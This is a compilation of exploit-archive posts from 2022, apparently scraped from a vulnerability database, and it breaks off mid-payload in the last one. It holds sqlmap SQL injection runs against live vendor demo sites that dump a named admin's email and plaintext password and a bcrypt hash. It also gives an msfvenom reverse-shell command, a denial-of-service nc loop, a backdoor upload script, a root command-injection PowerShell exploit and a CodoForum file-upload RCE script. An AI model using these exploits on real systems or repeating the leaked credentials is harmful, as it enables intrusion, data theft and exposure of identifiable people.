<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr │ │ :<br />│ Website : wvidesk.com │ │ │<br />│ Vendor : WVIDesk │ │ │<br />│ Software : Expert X - Jobs Portal and │ │ Expert X can manage jobs, courses, │<br />│ Resume Builder v. 1.0 │ │ events and scholarships. │<br />│ Vuln Type: Remote SQL Injection │ │ │<br />│ Method : GET │ │ │<br />│ Impact : Database Access │ │ │<br />│ │ │ │<br />│────────────────────────────────────────────┘ └─────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /> Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk<br /> loool, DevS, Dark-Gost, Carlos132sp, ProGenius <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'listed' is vulnerable.<br /><br />---<br />Parameter: listed (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: listed=1' AND 6926=6926 AND 'ZFlv'='ZFlv<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: listed=1' AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(6137=6137,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NsfD'='NsfD<br /><br /> Type: time-based blind<br /> Title: MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)<br /> Payload: listed=1' OR 8793=BENCHMARK(5000000,MD5(0x6643566c))#<br />---<br /><br />[+] Starting the Attack<br /><br />sqlmap.py -u "http://expert.wvidesk.com/companies?listed=1" --current-db --batch --random-agent<br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: PHP, Apache, PHP 5.6.40<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br />[23:03:36] [INFO] fetching current database<br />[23:03:36] [INFO] retrieved: 'livexzfv_jobdreamers'<br />current database: 'livexzfv_jobdreamers'<br /><br /><br />fetching tables for database: 'livexzfv_jobdreamers'<br /><br />Database: livexzfv_jobdreamers<br />[56 tables]<br />+---------------------+<br />| adminMenu |<br />| applyajob |<br />| candidatefeedback |<br />| candidatelogin |<br />| candidateview |<br />| clickcount |<br />| controlall |<br />| controlcategory |<br />| coursecategory |<br />| courseinstitute |<br />| coursevisitsite |<br />| eventcategory |<br />| eventtype |<br />| jobagentcountry |<br />| jobalert |<br />| jobcategory |<br />| jobcity |<br />| jobcompanyinfo |<br />| jobcontinent |<br />| jobcountry |<br />| jobeducationsubject |<br />| jobindustry |<br />| jobmessage |<br />| jobpostingprice |<br />| jobquestion |<br />| jobseniority |<br />| jobuniversity |<br />| jobusermaster |<br />| jobusertype |<br />| jobvisitsite |<br />| mainmenu |<br />| postacourse |<br />| postaevent |<br />| postajob |<br />| postascholarship |<br />| resumeaward |<br />| resumecarsum |<br />| resumecertificate |<br />| resumecomment |<br />| resumeeducation |<br />| resumelanguage |<br />| resumeprofessional |<br />| resumepublication |<br />| resumeresearch |<br />| resumeskill |<br />| resumesumexp |<br />| resumetraining |<br />| resumework |<br />| scholarshipperiod |<br />| seeker_profile |<br />| seekers_admin |<br />| siteAdmin |<br />| siteadminuser |<br />| tbl_countries |<br />| tblpage |<br />| userrole |<br />+---------------------+<br /><br />fetching columns for table 'siteadminuser' in database 'livexzfv_jobdreamers'<br /><br />Database: livexzfv_jobdreamers<br />Table: siteadminuser<br />[8 columns]<br />+----------+--------------+<br />| Column | Type |<br />+----------+--------------+<br />| aflag | varchar(2) |<br />| desig | varchar(200) |<br />| enet | varchar(450) |<br />| fullname | varchar(450) |<br />| id | int(10) |<br />| pw | varchar(25) |<br />| role | int(10) |<br />| users | varchar(200) |<br />+----------+--------------+<br /><br /><br />fetching entries of column(s) 'aflag,desig,enet,fullname,id,pw,role,users' for table 'siteadminuser' in database 'livexzfv_jobdreamers'<br /><br /><br />Database: livexzfv_jobdreamers<br />Table: siteadminuser<br />[1 entry]<br />+-------+------------+--------------------+------------------------+----+------+------+-------+<br />| aflag | desig | enet | fullname | id | pw | role | users |<br />+-------+------------+--------------------+------------------------+----+------+------+-------+<br />| Y | Site Admin | alam5664@gmail.com | Mohammad Alamgir Kabir | 1 | 5664 | 1 | Kabir |<br />+-------+------------+--------------------+------------------------+----+------+------+-------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>[+] Credits: Yehia Elghaly (aka Mrvar0x) <br />[+] Website: https://mrvar0x.com/<br />[+] Source: https://mrvar0x.com/2022/07/21/pcprotect-endpoint-tampering-exploit/<br /><br />Vendor:<br />=============<br />www.pcprotect.com<br /><br /><br />Product:<br />===========<br />PCProtect Endpoint Protection v5.17.470<br /><br />PCProtect is a malware detection and antivirus scanner. It uses advanced heuristics and a massive, continuously updated database to detect malware files on Windows, macOS, and Android devices. It also has an iOS app.<br />PCProtect also includes additional features, including:<br />Web shield - Virtual private network (VPN) - Data breach monitor - Identity theft protection - System optimizer- Password manager- And much more…<br /><br /><br />Vulnerability Type:<br />===================<br />Missing Tamper Protection<br />Incorrect Authorization<br /><br />CVE Reference:<br />==============<br />N/A<br /><br /><br />Security Issue:<br />================<br />PCProtect Antivirus prior to version 5.17.470 installed on Microsoft Windows does not provide sufficient anti-tampering protection of services by users with Administrator privileges. This could result in a user disabling PCProtect Antivirus and the protection offered by it. Also It lead to Raised privilege to SYSTEM.<br /><br />That can occurred by modifying a specific registry key.<br />Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityService<br />Change ImagePath path to a malicious executable.<br /><br /><br />Exploit/POC:<br />=============<br />Create malicious executable through msfvenom<br /><br />msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o meta.exe<br /><br />Modify (ImagePath) with the path of the malicious executable - Restart<br /><br /><br />Network Access:<br />===============<br />Local<br /><br /><br />Severity:<br />=========<br />High<br /><br /><br />[+] Disclaimer<br />The author is not responsible for any misuse of the information contained herein and accepts no responsibility<br />for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information<br />or exploits by the author or elsewhere. All content (c).<br /><br />Mrvar0x<br /></code></pre>
<pre><code># Exploit Title: CVE-2022-35911 - Patlite Overflow.<br /># Date: 2022-07-07<br /># Exploit Author: Samy Younsi - Necrum Security Labs<br /># Vendor Homepage: https://www.patlite.co.jp<br /># Software Link: https://www.patlite.co.jp/product/detail0000021462.html<br /># Version: Versions 1.46 and bellow are affected<br /># Tested on: CentOs & Ubuntu<br /># CVE : CVE-2022-35911<br /><br /><br />#!/bin/bash<br /><br />IP="192.168.1.101"<br />PORT="80"<br /><br />for i in {0..1000}; <br />do <br /> echo "[$i]: "; <br /> echo -ne "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHost: $IP\r\n\r\n" | nc $IP $PORT; <br />done > /dev/null 2>&1<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr │ │ :<br />│ Website : sangvish.com │ │ │<br />│ Vendor : SangVish Technologies │ │ │<br />│ Software : Marty Marketplace Multi Vendor │ │ Open Source Marketplace PHP script for │<br />│ Ecommerce Script v1.2 │ │ eCommerce marketplace platforms │<br />│ Vuln Type: Remote SQL Injection │ │ in the market │<br />│ Method : GET │ │ │<br />│ Impact : Database Access │ │ │<br />│ │ │ │<br />│────────────────────────────────────────────┘ └─────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /> Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk<br /> loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear<br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br /> Special Greetz to The Lebanese National Basketball Team for the results of<br /> the FIBA Asia Cup<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />GET parameter 'attributes[]' is vulnerable<br />---<br />Parameter: attributes[] (GET)<br /> Type: boolean-based blind<br /> Title: Boolean-based blind - Parameter replace (original value)<br /> Payload: attributes[]=(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END))<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: attributes[]=6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162)<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: attributes[]=6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn)<br />---<br /><br /><br />Demo: https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6<br /><br /><br />[+] Starting the Attack<br /><br />sqlmap.py -u "https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6" --current-db --batch<br /><br /><br />[+] fetching current database<br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: Apache<br />back-end DBMS: MySQL >= 5.6<br />[INFO] retrieved: 'garudan_buy2marty'<br />current database: 'garudan_buy2marty'<br /><br /><br />[+] fetching tables for database: 'garudan_buy2marty'<br /><br />Database: garudan_buy2marty<br />[105 tables]<br /><br />+----------------------------------------+<br />| activations |<br />| ads |<br />| ads_translations |<br />| audit_histories |<br />| categories |<br />| categories_translations |<br />| contact_replies |<br />| contacts |<br />| dashboard_widget_settings |<br />| dashboard_widgets |<br />| ec_brands |<br />| ec_brands_translations |<br />| ec_cart |<br />| ec_currencies |<br />| ec_customer_addresses |<br />| ec_customer_password_resets |<br />| ec_customers |<br />| ec_discount_customers |<br />| ec_discount_product_collections |<br />| ec_discount_products |<br />| ec_discounts |<br />| ec_flash_sale_products |<br />| ec_flash_sales |<br />| ec_flash_sales_translations |<br />| ec_grouped_products |<br />| ec_order_addresses |<br />| ec_order_histories |<br />| ec_order_product |<br />| ec_orders |<br />| ec_product_attribute_sets |<br />| ec_product_attribute_sets_translations |<br />| ec_product_attributes |<br />| ec_product_attributes_translations |<br />| ec_product_categories |<br />| ec_product_categories_translations |<br />| ec_product_category_product |<br />| ec_product_collection_products |<br />| ec_product_collections |<br />| ec_product_collections_translations |<br />| ec_product_cross_sale_relations |<br />| ec_product_label_products |<br />| ec_product_labels |<br />| ec_product_labels_translations |<br />| ec_product_related_relations |<br />| ec_product_tag_product |<br />| ec_product_tags |<br />| ec_product_tags_translations |<br />| ec_product_up_sale_relations |<br />| ec_product_variation_items |<br />| ec_product_variations |<br />| ec_product_with_attribute |<br />| ec_product_with_attribute_set |<br />| ec_products |<br />| ec_products_translations |<br />| ec_reviews |<br />| ec_shipment_histories |<br />| ec_shipments |<br />| ec_shipping |<br />| ec_shipping_rule_items |<br />| ec_shipping_rules |<br />| ec_store_locators |<br />| ec_taxes |<br />| ec_wish_lists |<br />| failed_jobs |<br />| faq_categories |<br />| faq_categories_translations |<br />| faqs |<br />| faqs_translations |<br />| jobs |<br />| language_meta |<br />| languages |<br />| media_files |<br />| media_folders |<br />| media_settings |<br />| menu_locations |<br />| menu_nodes |<br />| menus |<br />| meta_boxes |<br />| migrations |<br />| mp_customer_revenues |<br />| mp_customer_withdrawals |<br />| mp_stores |<br />| mp_vendor_info |<br />| newsletters |<br />| pages |<br />| pages_translations |<br />| password_resets |<br />| payments |<br />| post_categories |<br />| post_tags |<br />| posts |<br />| posts_translations |<br />| revisions |<br />| role_users |<br />| roles |<br />| settings |<br />| simple_slider_items |<br />| simple_sliders |<br />| slugs |<br />| tags |<br />| tags_translations |<br />| translations |<br />| user_meta |<br />| users |<br />| widgets |<br />+----------------------------------------+<br /><br /><br />[+] fetching columns for table 'users' in database 'garudan_buy2marty'<br /><br />Database: garudan_buy2marty<br />Table: users<br />[15 columns]<br /><br />+-------------------+---------------------+<br />| Column | Type |<br />+-------------------+---------------------+<br />| avatar_id | int(10) unsigned |<br />| created_at | timestamp |<br />| email | varchar(191) |<br />| email_verified_at | timestamp |<br />| first_name | varchar(191) |<br />| id | bigint(20) unsigned |<br />| last_login | timestamp |<br />| last_name | varchar(191) |<br />| manage_supers | tinyint(1) |<br />| password | varchar(191) |<br />| permissions | text |<br />| remember_token | varchar(100) |<br />| super_user | tinyint(1) |<br />| updated_at | timestamp |<br />| username | varchar(60) |<br />+-------------------+---------------------+<br /><br /><br />[+] fetching entries of column(s) 'id,password,permissions,super_user,username' for table 'users' in database 'garudan_buy2marty'<br /><br />Database: garudan_buy2marty<br />Table: users<br />[1 entry]<br /><br />+----+----------+--------------------------------------------------------------+------------+-------------+<br />| id | username | password | super_user | permissions |<br />+----+----------+--------------------------------------------------------------+------------+-------------+<br />| 1 | admin | $2y$10$XHYYo3gcYa5sUh62hgASseoSJfQae/w8KOWAW/G6qlHRri6XPRW/2 | 1 | NULL |<br />+----+----------+--------------------------------------------------------------+------------+-------------+<br /> Possible algorithms: bcrypt $2*$, Blowfish (Unix)<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/8b470931114527b4dce42034a95ebf46.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Eclipse.h<br />Vulnerability: Weak Hardcoded Credentials<br />Family: Eclipse<br />Type: PE32<br />MD5: 8b470931114527b4dce42034a95ebf46<br />Vuln ID: MVID-2022-0625<br />Disclosure: 07/21/2022<br />Description: The malware listens on TCP port 6210 and authentication is required. However, the backdoor accepts any USER name for authentication and the password "R-M" is weak and hardcoded within the PE file. Unpacking the UPX packed executable, easily reveals the cleartext hardcoded password.<br /><br />00437590 dd 3 ; Len<br />00437590 db 'R-M',0 ; Text<br />0043759C _str_6210 dd 0FFFFFFFFh ; _top<br /><br />Exploit/PoC:<br />C:\>nc64.exe 192.168.18.125 6210<br />220 Servidor FTP Temporal Ver. 2.1 por Vlad<br />USER malvuln<br />331 Password required for malvuln.<br />PASS R-M<br />230 User malvuln logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />MKD HATE<br />257 'C:\HATE': directory created.<br />CWD HATE<br />250 CWD command successful. "C:/HATE/" is current directory.<br />PASV<br />227 Entering Passive Mode (192,168,18,125,213,228).<br />STOR DOOM_SM.exe<br />150 Opening data connection for DOOM_SM.exe.<br />226 File received ok<br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=54756<br />DOOM="DOOM_SM.exe"<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> f = open(DOOM, "rb")<br /> EXE = f.read()<br /> s.send(EXE)<br /><br /> while EXE:<br /> s.send(EXE)<br /> EXE=f.read()<br /><br /> s.close()<br /><br /> print("By Malvuln");<br /><br />if __name__=="__main__":<br /> doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code><#SpaceLogic.ps1<br /><br />Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit<br /><br /><br />Vendor: Schneider Electric SE<br />Product web page: https://www.se.com<br /> https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/<br /> https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware<br />Affected version: SpaceLogic C-Bus Home Controller (5200WHC2)<br /> formerly known as C-Bus Wiser Home Controller MK2<br /> V1.31.460 and prior<br /> Firmware: 604<br /><br />Summary: SpaceLogic C-Bus Home Automation System<br />Lighting control and automation solutions for<br />buildings of the future, part of SpaceLogic.<br />SpaceLogic C-Bus is a powerful, fully integrated<br />system that can control and automate lighting<br />and many other electrical systems and products.<br />The SpaceLogic C-Bus system is robust, flexible,<br />scalable and has proven solutions for buildings<br />of the future. Implemented for commercial and<br />residential buildings automation, it brings<br />control, comfort, efficiency and ease of use<br />to its occupants.<br /><br />Wiser Home Control makes technologies in your<br />home easy by providing seamless control of music,<br />home theatre, lighting, air conditioning, sprinkler<br />systems, curtains and shutters, security systems...<br />you name it. Usable anytime, anywhere even when<br />you are away, via preset shortcuts or direct<br />control, in the same look and feel from a wall<br />switch, a home computer, or even your smartphone<br />or TV - there is no wiser way to enjoy 24/7<br />connectivity, comfort and convenience, entertainment<br />and peace of mind homewide! <br /><br />The Wiser 2 Home Controller allows you to access<br />your C-Bus using a graphical user interface, sometimes<br />referred to as the Wiser 2 UI. The Wiser 2 Home<br />Controller arrives with a sample project loaded<br />and the user interface accessible from your local<br />home network. With certain options set, you can<br />also access the Wiser 2 UI from anywhere using<br />the Internet. Using the Wiser 2 Home Controller<br />you can: control equipment such as IP cameras,<br />C-Bus devices and non C-Bus wired and wireless<br />equipment on the home LAN, schedule events in<br />the home, create and store scenes on-board, customise<br />a C-Bus system using the on-board Logic Engine,<br />monitor the home environment including C-Bus and<br />security systems, control ZigBee products such<br />as Ulti-ZigBee Dimmer, Relay, Groups and Curtains.<br /><br />Examples of equipment you might access with Wiser<br />2 Home Controller include lighting, HVAC, curtains,<br />cameras, sprinkler systems, power monitoring, Ulti-ZigBee,<br />multi-room audio and security controls.<br /><br />Desc: The home automation solution suffers from<br />an authenticated OS command injection vulnerability.<br />This can be exploited to inject and execute arbitrary<br />shell commands as the root user via the 'name' GET<br />parameter in 'delsnap.pl' Perl/CGI script which is<br />used for deleting snapshots taken from the webcam.<br /><br />=========================================================<br />/www/delsnap.pl:<br />----------------<br /><br />01: #!/usr/bin/perl<br />02: use IO::Handle;<br />03:<br />04:<br />05: select(STDERR);<br />06: $| = 1;<br />07: select(STDOUT);<br />08: $| = 1;<br />09:<br />10: #print "\r\n\r\n";<br />11:<br />12: $CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/';<br />13: use CGI;<br />14:<br />15: my $PROGNAME = "delsnap.pl";<br />16:<br />17: my $cgi = new CGI();<br />18:<br />19: my $name = $cgi->param('name');<br />20: if ($name eq "list") {<br />21: print "\r\n\r\n";<br />22: print "DATA=";<br />23: print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`;<br />24: exit(0);<br />25: }<br />26: if ($name eq "deleteall") {<br />27: print "\r\n\r\n";<br />28: print "DELETINGALL=TRUE&";<br />29: print `rm /mnt/microsd/clipsal/ugen/imgs/*`;<br />30: print "COMPLETED=true\n";<br />31: exit(0);<br />32: }<br />33: #print "name $name\n";<br />34: print "\r\n\r\n";<br />35: my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name";<br />36:<br />37: unlink $filename or die "COMPLETED=false\n";<br />38:<br />39: print "COMPLETED=true\n";<br /><br />=========================================================<br /><br />Tested on: Machine: OMAP3 Wiser2 Board<br /> CPU: ARMv7 revision 2<br /> GNU/Linux 2.6.37 (armv7l)<br /> BusyBox v1.22.1<br /> thttpd/2.25b<br /> Perl v5.20.0<br /> Clipsal 81<br /> Angstrom 2009.X-stable<br /> PICED 4.14.0.100<br /> lighttpd/1.7<br /> GCC 4.4.3<br /> NodeJS v10.15.3<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5710<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.php<br /><br />Vendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf<br /><br />CVE ID: CVE-2022-34753<br />CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753<br /><br /><br />27.03.2022<br /><br />#><br /><br /><br />$host.UI.RawUI.ForegroundColor = "Green"<br />if ($($args.Count) -ne 2) {<br /> Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n")<br />} else {<br /> $ip = $args[0]<br /> $cmd = $args[1]<br /> $cmdinj = "/delsnap.pl?name=|$cmd"<br /> Write-Host("`nSending command '$cmd' to $ip`n")<br /> #curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj<br /> curl -v $ip$cmdinj<br />}<br /><br /><br /><#PoC<br /><br />PS C:\> .\SpaceLogic.ps1<br /><br />Usage: .\SpaceLogic.ps1 [IP] [CMD]<br /><br /><br />PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd"<br /><br />Sending command 'uname -a;id;pwd' to 192.168.1.2<br /><br />VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payload<br />VERBOSE: received 129-byte response of content type text/html; charset=utf-8<br /><br /><br />StatusCode : 200<br />StatusDescription : OK<br />Content : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux<br /> uid=0(root) gid=0(root)<br /> /custom-package<br /> <br />RawContent : HTTP/1.1 200 OK<br /> Access-Control-Allow-Origin: *<br /> Connection: keep-alive<br /> Content-Length: 129<br /> Content-Type: text/html; charset=utf-8<br /> Date: Thu, 30 Jun 2022 14:48:43 GMT<br /> ETag: W/"81-LTIWJvYlDBYAlgXEy...<br />Forms : {}<br />Headers : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html; <br /> charset=utf-8]...}<br />Images : {}<br />InputFields : {}<br />Links : {}<br />ParsedHtml : mshtml.HTMLDocumentClass<br />RawContentLength : 129<br /><br /><br /><br /><br />PS C:\><br />#><br /></code></pre>
<pre><code># Exploit Title: CodoForum v5.1 - Remote Code Execution (RCE)<br /># Date: 06/07/2022<br /># Exploit Author: Krish Pandey (@vikaran101)<br /># Vendor Homepage: https://codoforum.com/<br /># Software Link: https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip<br /># Version: CodoForum v5.1<br /># Tested on: Ubuntu 20.04<br /># CVE: CVE-2022-31854<br /><br />#!/usr/bin/python3<br /><br />import requests<br />import time<br />import optparse<br />import random<br />import string<br /><br />banner = """<br /> ______ _______ ____ ___ ____ ____ _____ _ ___ ____ _ _ <br /> / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ // |( _ ) ___|| || | <br />| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \| |/ _ \___ \| || |_ <br />| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) | | (_) |__) |__ _|<br /> \____| \_/ |_____| |_____|\___/_____|_____| |____/|_|\___/____/ |_| <br />"""<br /><br />print("\nCODOFORUM V5.1 ARBITRARY FILE UPLOAD TO RCE(Authenticated)")<br />print(banner)<br />print("\nExploit found and written by: @vikaran101\n")<br /><br />parser = optparse.OptionParser()<br />parser.add_option('-t', '--target-url', action="store", dest='target', help='path of the CodoForum v5.1 install')<br />parser.add_option('-u', '--username', action="store", dest='username', help='admin username')<br />parser.add_option('-p', '--password', action="store", dest='password', help='admin password')<br />parser.add_option('-i', '--listener-ip', action="store", dest='ip', help='listener address')<br />parser.add_option('-n', '--port', action="store", dest='port', help='listener port number')<br /><br />options, args = parser.parse_args()<br /><br />proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}<br /><br />if not options.target or not options.username or not options.password or not options.ip or not options.port:<br /> print("[-] Missing arguments!")<br /> print("[*] Example usage: ./exploit.py -t [target url] -u [username] -p [password] -i [listener ip] -n [listener port]")<br /> print("[*] Help menu: ./exploit.py -h OR ./exploit.py --help")<br /> exit()<br /><br />loginURL = options.target + '/admin/?page=login'<br />globalSettings = options.target + '/admin/index.php?page=config'<br />payloadURL = options.target + '/sites/default/assets/img/attachments/'<br /><br />session = requests.Session()<br /><br />randomFileName = ''.join((random.choice(string.ascii_lowercase) for x in range(10)))<br /><br />def getPHPSESSID():<br /> <br /> try:<br /> get_PHPID = session.get(loginURL)<br /> headerDict = get_PHPID.headers<br /> cookies = headerDict['Set-Cookie'].split(';')[0].split('=')[1]<br /> return cookies<br /> except:<br /> exit()<br /><br />phpID = getPHPSESSID()<br /><br />def login():<br /> send_cookies = {'cf':'0'}<br /> send_headers = {'Host': loginURL.split('/')[2], 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','Content-Type':'multipart/form-data; boundary=---------------------------2838079316671520531167093219','Content-Length':'295','Origin':loginURL.split('/')[2],'Connection':'close','Referer':loginURL,'Upgrade-Insecure-Requests':'1'}<br /> send_creds = "-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"password\"\n\nadmin\n-----------------------------2838079316671520531167093219--"<br /> auth = session.post(loginURL, headers=send_headers, cookies=send_cookies, data=send_creds, proxies=proxy)<br /><br /> if "CODOFORUM | Dashboard" in auth.text:<br /> print("[+] Login successful")<br /><br />def uploadAndExploit():<br /> send_cookies = {'cf':'0', 'user_id':'1', 'PHPSESSID':phpID}<br /> send_headers = {'Content-Type':'multipart/form-data; boundary=---------------------------7450086019562444223451102689'}<br /> send_payload = '\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_title"\n\nCODOLOGIC\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_description"\n\ncodoforum - Enhancing your forum experience with next generation technology!\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="admin_email"\n\nadmin@codologic.com\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="default_timezone"\n\nEurope/London\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="register_pass_min"\n\n8\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_all_topics"\n\n30\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_cat_topics"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_per_topic"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_path"\n\nassets/img/attachments\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_exts"\n\njpg,jpeg,png,gif,pjpeg,bmp,txt\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_size"\n\n3\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_mimetypes"\n\nimage/*,text/plain\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_num"\n\n5\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_len"\n\n15\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="reply_min_chars"\n\n10\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="insert_oembed_videos"\n\nyes\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_privacy"\n\neveryone\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; 